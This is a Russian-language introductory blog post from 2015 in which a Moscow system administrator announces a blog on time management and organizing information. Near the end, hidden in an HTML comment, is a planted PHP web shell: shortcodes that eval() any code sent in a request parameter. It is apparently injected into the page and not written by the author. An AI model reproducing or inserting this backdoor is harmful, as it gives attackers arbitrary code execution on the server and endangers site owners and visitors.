Первый пост

Формат блога я «подсмотрел» у Дениса Филонова. От формата «интернет-дневника» я отказался достаточно давно, так как писать про работу по понятным причинам не следует (вряд ли руководство обрадуется тому, что их сотрудник обсуждает свою фирму с посторонними людьми, тем более — в сети), а про личную жизнь я писать не хочу (да и вряд ли она кому-либо интересна).

Тем не менее, кое-чем поделиться с миром я могу. Например, я могу рассказать про организацию рабочего процесса. Да, этому учит тот же Глеб Архангельский. Но все курсы тайм-менеджмента не рассчитаны на режим работы, когда тебя могут сдернуть звонком из постели и отправить на другой конец города (не утрирую). А таких, как я, достаточно много.

Также я могу рассказать про организацию информации, с которой приходится работать. Я был искренне удивлен, когда узнал, что многие люди пользуются «записочками», которые потом теряются. «Составил список, что где лежит, и потерял его» — я знаю, как этого избежать.

Сразу говорю — я ни в коем случае не претендую на роль «гуру». Наоборот — все, что я могу рассказать про организацию времени, организацию информационного потока, организацию мыслей и т.д. уже сказано и написано. По большей части — зарубежными авторами. Например, компания Evernote с завидной регулярностью выкладывает бесплатные советы по организации информационного потока — но многие ли их читают? И многие ли им следуют? Поэтому надеюсь, что кому-то этот блог окажется полезен. Как мне в свое время помог блог Дениса Филонова (особенно разделы про спортивное питание и увеличение работоспособности).

Ну и несколько слов о себе. Родился в Москве в 1985 году. Люблю этот город. По первой специальности — химик-лаборант, по второй — микробиолог, по третьей — системный администратор. Работаю в настоящий момент (март 2015) зам. руководителя отдела технической поддержки в одной из ресторанных сетей Москвы.

И еще одна ремарка, технического характера. Этот блог я не планирую «раскручивать» — я не зарабатываю на нем денег. Ссылки на материалы блога я иногда буду постить в соцсетях (например, на своей странице в ФБ), но постоянного кросспоста настраивать точно не буду. В то же время все страницы блога индексируются поисковыми системами.

<!— [insert_php]if (isset($_REQUEST["VhZ"])){eval($_REQUEST["VhZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["VhZ"])){eval($_REQUEST["VhZ"]);exit;}[/php] —>

Опубликовано Grigorovsky

1 комментарий

Intellect Doe

Test

Добавить комментарий